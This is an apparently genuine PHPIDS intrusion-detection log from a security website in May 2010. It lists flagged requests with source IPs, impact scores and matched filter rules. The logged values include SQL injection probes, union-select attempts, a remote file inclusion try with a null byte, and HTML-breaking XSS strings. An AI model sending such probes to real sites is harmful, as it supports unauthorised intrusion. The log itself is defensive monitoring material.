| ID: | 123241 | | Name: | REQUEST.page | | Value: | security/?page=security/hackingillustrated'`([{^~ | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E | | IP: | 60.4.51.66 | | Impact: | 24 | | Created: | 2010-05-03 01:12:52 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 2.8666666666667 Converted: ((((+++::
|
| ID: | 123242 | | Name: | GET.page | | Value: | security/?page=security/hackingillustrated'`([{^~ | | Page: | /i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E | | IP: | 60.4.51.66 | | Impact: | 24 | | Created: | 2010-05-03 01:12:52 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 2.8666666666667 Converted: ((((+++::
|
| ID: | 123239 | | Name: | REQUEST.page | | Value: | http://www.reiluke.site90.com/index.php? security/hackingillustrated | | Page: | /i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated | | IP: | 80.98.105.208 | | Impact: | 10 | | Created: | 2010-05-02 22:56:13 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123240 | | Name: | GET.page | | Value: | http://www.reiluke.site90.com/index.php? security/hackingillustrated | | Page: | /i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated | | IP: | 80.98.105.208 | | Impact: | 10 | | Created: | 2010-05-02 22:56:13 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 123237 | | Name: | REQUEST.page | | Value: | security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker | | Page: | /i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker | | IP: | 66.249.67.227 | | Impact: | 42 | | Created: | 2010-05-02 14:43:32 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123238 | | Name: | GET.page | | Value: | security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker | | Page: | /i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker | | IP: | 66.249.67.227 | | Impact: | 42 | | Created: | 2010-05-02 14:43:32 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123235 | | Name: | REQUEST.page | | Value: | videos/samdump2auditor%3C/a%3E%3Cbr%20/%3E%3Ca%20href= | | Page: | /i.php?page=videos/samdump2auditor%253C/a%253E%253Cbr%2520/%253E%253Ca%2520href= | | IP: | 67.195.111.36 | | Impact: | 8 | | Created: | 2010-05-02 14:32:33 | | Details: | Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
|
| ID: | 123236 | | Name: | GET.page | | Value: | videos/samdump2auditor%3C/a%3E%3Cbr%20/%3E%3Ca%20href= | | Page: | /i.php?page=videos/samdump2auditor%253C/a%253E%253Cbr%2520/%253E%253Ca%2520href= | | IP: | 67.195.111.36 | | Impact: | 8 | | Created: | 2010-05-02 14:32:33 | | Details: | Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
|
| ID: | 123233 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:54:44 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123234 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:54:44 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123231 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:54:23 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123232 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:54:23 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123229 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:54:03 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123230 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:54:03 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123227 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:52:19 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123228 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:52:19 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123225 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:51:58 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123226 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:51:58 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123223 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:51:37 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123224 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:51:37 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123221 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:51:17 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123222 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:51:17 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123219 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:50:07 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123220 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:50:07 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123217 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:49:46 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123218 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:49:46 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123215 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:49:25 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123216 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:49:25 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123213 | | Name: | REQUEST.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:49:05 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123214 | | Name: | GET.a | | Value: | or1=1-- | | Page: | /?a=or1=1-- | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-02 11:49:05 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123211 | | Name: | REQUEST.page | | Value: | videos/samdump2auditor</a><br%20/><a%20href= | | Page: | /i.php?page=videos/samdump2auditor%3C/a%3E%3Cbr%2520/%3E%3Ca%2520href= | | IP: | 67.195.111.36 | | Impact: | 8 | | Created: | 2010-05-02 05:57:28 | | Details: | Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
|
| ID: | 123212 | | Name: | GET.page | | Value: | videos/samdump2auditor</a><br%20/><a%20href= | | Page: | /i.php?page=videos/samdump2auditor%3C/a%3E%3Cbr%2520/%3E%3Ca%2520href= | | IP: | 67.195.111.36 | | Impact: | 8 | | Created: | 2010-05-02 05:57:28 | | Details: | Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
|
| ID: | 123209 | | Name: | REQUEST.page | | Value: | '' | | Page: | /i.php?page='' | | IP: | 208.80.193.39 | | Impact: | 12 | | Created: | 2010-05-02 05:20:34 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 123210 | | Name: | GET.page | | Value: | '' | | Page: | /i.php?page='' | | IP: | 208.80.193.39 | | Impact: | 12 | | Created: | 2010-05-02 05:20:34 | | Details: | Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
|
| ID: | 123207 | | Name: | REQUEST.tab | | Value: | support</a | | Page: | /i.php?tab=support</a | | IP: | 41.232.244.131 | | Impact: | 8 | | Created: | 2010-05-02 05:11:28 | | Details: | Description: Detects attributes in closing tags and conditional compilation tokens | Tags: xss, csrf | ID: 34
|
| ID: | 123208 | | Name: | GET.tab | | Value: | support</a | | Page: | /i.php?tab=support</a | | IP: | 41.232.244.131 | | Impact: | 8 | | Created: | 2010-05-02 05:11:28 | | Details: | Description: Detects attributes in closing tags and conditional compilation tokens | Tags: xss, csrf | ID: 34
|
| ID: | 123205 | | Name: | REQUEST.bcsi_scan_24E43ADEA8953CDD | | Value: | JO55Ucd5DdwPAraHF7iSrTeXR3YCAAAAWE84AA== | | Page: | /i.php?page=security/networkprinterhacking&bcsi_scan_24E43ADEA8953CDD=JO55Ucd5DdwPAraHF7iSrTeXR3YCAAAAWE84AA==&bcsi_scan_filename=i.php | | IP: | 207.46.204.219 | | Impact: | 14 | | Created: | 2010-05-02 04:39:32 | | Details: | Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 2.6428571428571
|
| ID: | 123206 | | Name: | GET.bcsi_scan_24E43ADEA8953CDD | | Value: | JO55Ucd5DdwPAraHF7iSrTeXR3YCAAAAWE84AA== | | Page: | /i.php?page=security/networkprinterhacking&bcsi_scan_24E43ADEA8953CDD=JO55Ucd5DdwPAraHF7iSrTeXR3YCAAAAWE84AA==&bcsi_scan_filename=i.php | | IP: | 207.46.204.219 | | Impact: | 14 | | Created: | 2010-05-02 04:39:32 | | Details: | Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 2.6428571428571
|
| ID: | 123203 | | Name: | REQUEST.page | | Value: | security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a>
<br>
<a href= | | Page: | /i.php?page=security/hackingillustrated%20target=_parent%20%3EIronGeek.com%20Hacking%20Illustrated%3C/a%3E%0D%0A%09%09%09%09%20%20%20%20%3Cbr%3E%0D%0A%0D%0A%09%09%09%09%20%20%20%20%3Ca%20href= | | IP: | 67.195.111.36 | | Impact: | 8 | | Created: | 2010-05-02 04:23:18 | | Details: |
<a href= Impact: 4 | Tags: xss Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 123204 | | Name: | GET.page | | Value: | security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a>
<br>
<a href= | | Page: | /i.php?page=security/hackingillustrated%20target=_parent%20%3EIronGeek.com%20Hacking%20Illustrated%3C/a%3E%0D%0A%09%09%09%09%20%20%20%20%3Cbr%3E%0D%0A%0D%0A%09%09%09%09%20%20%20%20%3Ca%20href= | | IP: | 67.195.111.36 | | Impact: | 8 | | Created: | 2010-05-02 04:23:18 | | Details: |
<a href= Impact: 4 | Tags: xss Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 123201 | | Name: | REQUEST.page | | Value: | security/AQuickIntrotoSniffersCHAR(57, 55) | | Page: | /i.php?page=security/AQuickIntrotoSniffersCHAR(57,%2055) | | IP: | 67.195.111.36 | | Impact: | 12 | | Created: | 2010-05-02 02:32:47 | | Details: | Description: Detects MySQL comments, conditions and ch(a)r injections | Tags: sqli, id, lfi | ID: 40
|
| ID: | 123202 | | Name: | GET.page | | Value: | security/AQuickIntrotoSniffersCHAR(57, 55) | | Page: | /i.php?page=security/AQuickIntrotoSniffersCHAR(57,%2055) | | IP: | 67.195.111.36 | | Impact: | 12 | | Created: | 2010-05-02 02:32:47 | | Details: | Description: Detects MySQL comments, conditions and ch(a)r injections | Tags: sqli, id, lfi | ID: 40
|
| ID: | 123199 | | Name: | REQUEST.page | | Value: | security/hackingillustrated' and 'a'='a | | Page: | /i.php?page=security/hackingillustrated'%20and%20'a'='a | | IP: | 58.247.31.139 | | Impact: | 34 | | Created: | 2010-05-02 02:32:32 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123200 | | Name: | GET.page | | Value: | security/hackingillustrated' and 'a'='a | | Page: | /i.php?page=security/hackingillustrated'%20and%20'a'='a | | IP: | 58.247.31.139 | | Impact: | 34 | | Created: | 2010-05-02 02:32:32 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123197 | | Name: | REQUEST.page | | Value: | security/hackingillustrated' and user=0 and '1'='1 | | Page: | /i.php?page=security/hackingillustrated'%20and%20user=0%20and%20'1'='1 | | IP: | 58.247.31.139 | | Impact: | 56 | | Created: | 2010-05-02 02:32:29 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123198 | | Name: | GET.page | | Value: | security/hackingillustrated' and user=0 and '1'='1 | | Page: | /i.php?page=security/hackingillustrated'%20and%20user=0%20and%20'1'='1 | | IP: | 58.247.31.139 | | Impact: | 56 | | Created: | 2010-05-02 02:32:29 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123195 | | Name: | REQUEST.page | | Value: | security/hackingillustrated' and user=0 and '1'='1 | | Page: | /i.php?page=security/hackingillustrated'%20and%20user=0%20and%20'1'='1 | | IP: | 58.247.31.139 | | Impact: | 56 | | Created: | 2010-05-02 02:32:28 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123196 | | Name: | GET.page | | Value: | security/hackingillustrated' and user=0 and '1'='1 | | Page: | /i.php?page=security/hackingillustrated'%20and%20user=0%20and%20'1'='1 | | IP: | 58.247.31.139 | | Impact: | 56 | | Created: | 2010-05-02 02:32:28 | | Details: | Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2 Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123193 | | Name: | REQUEST.page | | Value: | security/hackingillustrated' and user=0-- | | Page: | /i.php?page=security/hackingillustrated'%20and%20user=0-- | | IP: | 58.247.31.139 | | Impact: | 32 | | Created: | 2010-05-02 02:32:26 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123194 | | Name: | GET.page | | Value: | security/hackingillustrated' and user=0-- | | Page: | /i.php?page=security/hackingillustrated'%20and%20user=0-- | | IP: | 58.247.31.139 | | Impact: | 32 | | Created: | 2010-05-02 02:32:26 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123191 | | Name: | REQUEST.page | | Value: | security/hackingillustrated' and user=0-- | | Page: | /i.php?page=security/hackingillustrated'%20and%20user=0-- | | IP: | 58.247.31.139 | | Impact: | 32 | | Created: | 2010-05-02 02:32:24 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123192 | | Name: | GET.page | | Value: | security/hackingillustrated' and user=0-- | | Page: | /i.php?page=security/hackingillustrated'%20and%20user=0-- | | IP: | 58.247.31.139 | | Impact: | 32 | | Created: | 2010-05-02 02:32:24 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 123189 | | Name: | REQUEST.page | | Value: | security/hackingillustrated and user=0-- | | Page: | /i.php?page=security/hackingillustrated%20and%20user=0-- | | IP: | 58.247.31.139 | | Impact: | 18 | | Created: | 2010-05-02 02:32:23 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48
|
| ID: | 123190 | | Name: | GET.page | | Value: | security/hackingillustrated and user=0-- | | Page: | /i.php?page=security/hackingillustrated%20and%20user=0-- | | IP: | 58.247.31.139 | | Impact: | 18 | | Created: | 2010-05-02 02:32:23 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48
|
| ID: | 123187 | | Name: | REQUEST.page | | Value: | security/hackingillustrated and user=0-- | | Page: | /i.php?page=security/hackingillustrated%20and%20user=0-- | | IP: | 58.247.31.139 | | Impact: | 18 | | Created: | 2010-05-02 02:32:21 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48
|
| ID: | 123188 | | Name: | GET.page | | Value: | security/hackingillustrated and user=0-- | | Page: | /i.php?page=security/hackingillustrated%20and%20user=0-- | | IP: | 58.247.31.139 | | Impact: | 18 | | Created: | 2010-05-02 02:32:21 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48
|
| ID: | 123185 | | Name: | REQUEST.page | | Value: | security/hackingillustrated and user=0 and 1=1 | | Page: | /i.php?page=security/hackingillustrated%20and%20user=0%20and%201=1 | | IP: | 58.247.31.139 | | Impact: | 12 | | Created: | 2010-05-02 02:32:19 | | Details: | Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48
|
| ID: | 123186 | | Name: | GET.page | | Value: | security/hackingillustrated and user=0 and 1=1 | | Page: | /i.php?page=security/hackingillustrated%20and%20user=0%20and%201=1 | | IP: | 58.247.31.139 | | Impact: | 12 | | Created: | 2010-05-02 02:32:19 | | Details: | Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48
|
| ID: | 123183 | | Name: | REQUEST.page | | Value: | security/hackingillustrated and user=0 and 1=1 | | Page: | /i.php?page=security/hackingillustrated%20and%20user=0%20and%201=1 | | IP: | 58.247.31.139 | | Impact: | 12 | | Created: | 2010-05-02 02:32:18 | | Details: | Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48
|
| ID: | 123184 | | Name: | GET.page | | Value: | security/hackingillustrated and user=0 and 1=1 | | Page: | /i.php?page=security/hackingillustrated%20and%20user=0%20and%201=1 | | IP: | 58.247.31.139 | | Impact: | 12 | | Created: | 2010-05-02 02:32:18 | | Details: | Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48
|
| ID: | 123181 | | Name: | REQUEST.page | | Value: | security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a>
<br>
<a href= | | Page: | /i.php?page=security/hackingillustrated+target=_parent+%3EIronGeek.com+Hacking+Illustrated%3C/a%3E%0D%0A%09%09%09%09++++%3Cbr%3E%0D%0A%0D%0A%09%09%09%09++++%3Ca+href= | | IP: | 66.249.67.227 | | Impact: | 8 | | Created: | 2010-05-01 23:06:48 | | Details: |
<a href= Impact: 4 | Tags: xss Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 123182 | | Name: | GET.page | | Value: | security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a>
<br>
<a href= | | Page: | /i.php?page=security/hackingillustrated+target=_parent+%3EIronGeek.com+Hacking+Illustrated%3C/a%3E%0D%0A%09%09%09%09++++%3Cbr%3E%0D%0A%0D%0A%09%09%09%09++++%3Ca+href= | | IP: | 66.249.67.227 | | Impact: | 8 | | Created: | 2010-05-01 23:06:48 | | Details: |
<a href= Impact: 4 | Tags: xss Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 123179 | | Name: | REQUEST.page | | Value: | security/changemac and 0=1 union select | | Page: | /i.php?page=security/changemac+and+0=1+union+select+ | | IP: | 117.0.100.152 | | Impact: | 20 | | Created: | 2010-05-01 22:47:19 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123180 | | Name: | GET.page | | Value: | security/changemac and 0=1 union select | | Page: | /i.php?page=security/changemac+and+0=1+union+select+ | | IP: | 117.0.100.152 | | Impact: | 20 | | Created: | 2010-05-01 22:47:19 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123177 | | Name: | REQUEST.page | | Value: | security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker | | Page: | /i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker | | IP: | 66.249.67.227 | | Impact: | 42 | | Created: | 2010-05-01 22:46:22 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123178 | | Name: | GET.page | | Value: | security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker | | Page: | /i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker | | IP: | 66.249.67.227 | | Impact: | 42 | | Created: | 2010-05-01 22:46:22 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 123175 | | Name: | REQUEST.mode | | Value: | /* | | Page: | /i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10&mode=/%2A | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-01 19:15:11 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123176 | | Name: | GET.mode | | Value: | /* | | Page: | /i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10&mode=/%2A | | IP: | 67.195.111.36 | | Impact: | 6 | | Created: | 2010-05-01 19:15:11 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 123173 | | Name: | REQUEST.page | | Value: | backtrack-3 and 0=1 union select -man/ike-scan | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan | | IP: | 123.19.99.34 | | Impact: | 20 | | Created: | 2010-05-01 18:40:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123174 | | Name: | GET.page | | Value: | backtrack-3 and 0=1 union select -man/ike-scan | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan | | IP: | 123.19.99.34 | | Impact: | 20 | | Created: | 2010-05-01 18:40:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123171 | | Name: | REQUEST.page | | Value: | backtrack-3 and 0=1 union select -man/nemesis-ip | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip | | IP: | 123.19.99.34 | | Impact: | 20 | | Created: | 2010-05-01 18:40:09 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 123172 | | Name: | GET.page | | Value: | backtrack-3 and 0=1 union select -man/nemesis-ip | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip | | IP: | 123.19.99.34 | | Impact: | 20 | | Created: | 2010-05-01 18:40:09 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
